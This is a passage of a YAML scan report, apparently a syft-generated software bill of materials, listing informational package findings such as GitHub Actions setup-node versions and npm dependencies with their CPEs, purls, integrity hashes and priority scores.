- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:github/actions/setup-node@v1
metadataType: github-actions-use-statement
metadata:
value: actions/setup-node@v1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f2b699c115f128e7
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
startLine: 0
message: 'Package discovered: actions/setup-node v2'
title: actions/setup-node v2
description: 'Package discovered: actions/setup-node v2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 94c6b30301562d90
name: actions/setup-node
version: v2
type: github-action
foundBy: github-actions-usage-cataloger
locations:
- path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
accessPath: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
annotations:
evidence: primary
licenses: []
language: ''
cpes:
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:github/actions/setup-node@v2
metadataType: github-actions-use-statement
metadata:
value: actions/setup-node@v2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c207c7fc955b5ded
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/stream-shift/.github/workflows/test.yml
startLine: 0
message: 'Package discovered: actions/setup-node v3'
title: actions/setup-node v3
description: 'Package discovered: actions/setup-node v3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c1170e00c0039987
name: actions/setup-node
version: v3
type: github-action
foundBy: github-actions-usage-cataloger
locations:
- path: /node_modules/stream-shift/.github/workflows/test.yml
accessPath: /node_modules/stream-shift/.github/workflows/test.yml
annotations:
evidence: primary
licenses: []
language: ''
cpes:
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:github/actions/setup-node@v3
metadataType: github-actions-use-statement
metadata:
value: actions/setup-node@v3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 751a614666804651
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/reusify/.github/workflows/ci.yml
startLine: 0
message: 'Package discovered: actions/setup-node v4'
title: actions/setup-node v4
description: 'Package discovered: actions/setup-node v4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: de6527b74c32bd7a
name: actions/setup-node
version: v4
type: github-action
foundBy: github-actions-usage-cataloger
locations:
- path: /node_modules/reusify/.github/workflows/ci.yml
accessPath: /node_modules/reusify/.github/workflows/ci.yml
annotations:
evidence: primary
licenses: []
language: ''
cpes:
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:github/actions/setup-node@v4
metadataType: github-actions-use-statement
metadata:
value: actions/setup-node@v4
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 87ee223622bbf049
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: agent-base 6.0.2'
title: agent-base 6.0.2
description: 'Package discovered: agent-base 6.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 12d1ed2dd95a1a7c
name: agent-base
version: 6.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:agent-base:agent-base:6.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:agent-base:agent_base:6.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:agent_base:agent-base:6.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:agent_base:agent_base:6.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:agent:agent-base:6.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:agent:agent_base:6.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/agent-base@6.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz
integrity: sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==
dependencies:
debug: '4'
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 3360c58589af5938
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: agent-base 7.1.4'
title: agent-base 7.1.4
description: 'Package discovered: agent-base 7.1.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f7259be6132b188d
name: agent-base
version: 7.1.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:agent-base:agent-base:7.1.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:agent-base:agent_base:7.1.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:agent_base:agent-base:7.1.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:agent_base:agent_base:7.1.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:agent:agent-base:7.1.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:agent:agent_base:7.1.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/agent-base@7.1.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz
integrity: sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 83a9e4994a4bae21
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: ansi-regex 5.0.1'
title: ansi-regex 5.0.1
description: 'Package discovered: ansi-regex 5.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 434b3315d409487e
name: ansi-regex
version: 5.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:ansi-regex_project:ansi-regex:5.0.1:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/ansi-regex@5.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz
integrity: sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 55dee429ce8d0ebc
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: ansi-regex 6.2.2'
title: ansi-regex 6.2.2
description: 'Package discovered: ansi-regex 6.2.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 351fe1b55f0afa57
name: ansi-regex
version: 6.2.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:ansi-regex_project:ansi-regex:6.2.2:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/ansi-regex@6.2.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.2.2.tgz
integrity: sha512-Bq3SmSpyFHaWjPk8If9yc6svM8c56dB5BAtW4Qbw5jHTwwXXcTLoRMkpDJp6VL0XzlWaCHTXrkFURMYmD0sLqg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 78d002033ed5f3df
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: ansi-styles 4.3.0'
title: ansi-styles 4.3.0
description: 'Package discovered: ansi-styles 4.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d7348151a8592cc2
name: ansi-styles
version: 4.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:ansi-styles:ansi-styles:4.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ansi-styles:ansi_styles:4.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ansi_styles:ansi-styles:4.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ansi_styles:ansi_styles:4.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ansi:ansi-styles:4.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ansi:ansi_styles:4.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/ansi-styles@4.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz
integrity: sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==
dependencies:
color-convert: ^2.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 5a3dc64757afbf1c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: ansi-styles 6.2.3'
title: ansi-styles 6.2.3
description: 'Package discovered: ansi-styles 6.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b7d3f8e2ee8c8206
name: ansi-styles
version: 6.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:ansi-styles:ansi-styles:6.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ansi-styles:ansi_styles:6.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ansi_styles:ansi-styles:6.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ansi_styles:ansi_styles:6.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ansi:ansi-styles:6.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ansi:ansi_styles:6.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/ansi-styles@6.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.3.tgz
integrity: sha512-4Dj6M28JB+oAH8kFkTLUo+a2jwOFkuqb3yucU0CANcRRUbxS0cP0nZYCGjcc3BNXwRIsUVmDGgzawme7zvJHvg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a0800e7f7f0173c9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: any-promise 1.3.0'
title: any-promise 1.3.0
description: 'Package discovered: any-promise 1.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: dc69ebae19192ee6
name: any-promise
version: 1.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:any-promise:any-promise:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:any-promise:any_promise:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:any_promise:any-promise:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:any_promise:any_promise:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:any:any-promise:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:any:any_promise:1.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/any-promise@1.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/any-promise/-/any-promise-1.3.0.tgz
integrity: sha512-7UvmKalWRt1wgjL1RrGxoSJW/0QZFIegpeGvZG9kjp8vrRu55XTHbwnqq2GpXm9uLbcuhxm3IqX9OB4MZR1b2A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4e58783cc9de2b91
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: anymatch 3.1.3'
title: anymatch 3.1.3
description: 'Package discovered: anymatch 3.1.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0f1f6d6adbfca65a
name: anymatch
version: 3.1.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:jonschlinkert:anymatch:3.1.3:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/anymatch@3.1.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz
integrity: sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==
dependencies:
normalize-path: ^3.0.0
picomatch: ^2.0.4
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c5e1f2e50730714b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: append-field 1.0.0'
title: append-field 1.0.0
description: 'Package discovered: append-field 1.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 02ed6bf0c016d0d3
name: append-field
version: 1.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:append-field:append-field:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:append-field:append_field:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:append_field:append-field:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:append_field:append_field:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:append:append-field:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:append:append_field:1.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/append-field@1.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/append-field/-/append-field-1.0.0.tgz
integrity: sha512-klpgFSWLW1ZEs8svjfb7g4qWY0YS5imI82dTg+QahUvJ8YqAY0P10Uk8tTyh9ZGuYEZEMaeJYCF5BFuX552hsw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 413f489faf894e63
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: arg 5.0.2'
title: arg 5.0.2
description: 'Package discovered: arg 5.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c190b80836cef557
name: arg
version: 5.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:arg:arg:5.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/arg@5.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/arg/-/arg-5.0.2.tgz
integrity: sha512-PYjyFOLKQ9y57JvQ6QLo8dAgNqswh8M1RMJYdQduT6xbWSgK36P/Z/v+p888pM69jMMfS8Xd8F6I1kQ/I9HUGg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0ee2786b2f8f8ad4
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: array-flatten 1.1.1'
title: array-flatten 1.1.1
description: 'Package discovered: array-flatten 1.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f61b69e470287928
name: array-flatten
version: 1.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:array-flatten:array-flatten:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:array-flatten:array_flatten:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:array_flatten:array-flatten:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:array_flatten:array_flatten:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:array:array-flatten:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:array:array_flatten:1.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/array-flatten@1.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/array-flatten/-/array-flatten-1.1.1.tgz
integrity: sha512-PCVAQswWemu6UdxsDFFX/+gVeYqKAod3D3UVm91jHwynguOwAvYPhx8nNlM++NqRcK6CxxpUafjmhIdKiHibqg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 374f7e7db72708e5
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: arrify 2.0.1'
title: arrify 2.0.1
description: 'Package discovered: arrify 2.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e733388ffa39ebc5
name: arrify
version: 2.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:arrify:arrify:2.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/arrify@2.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/arrify/-/arrify-2.0.1.tgz
integrity: sha512-3duEwti880xqi4eAMN8AyR4a0ByT90zoYdLlevfrvU43vb0YZwZVfxOgxWrLXXXpyugL0hNZc9G6BiB5B3nUug==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e3ccd8258c57c2f8
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: async-retry 1.3.3'
title: async-retry 1.3.3
description: 'Package discovered: async-retry 1.3.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3f1747f861c5fded
name: async-retry
version: 1.3.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:async-retry:async-retry:1.3.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:async-retry:async_retry:1.3.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:async_retry:async-retry:1.3.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:async_retry:async_retry:1.3.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:async:async-retry:1.3.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:async:async_retry:1.3.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/async-retry@1.3.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/async-retry/-/async-retry-1.3.3.tgz
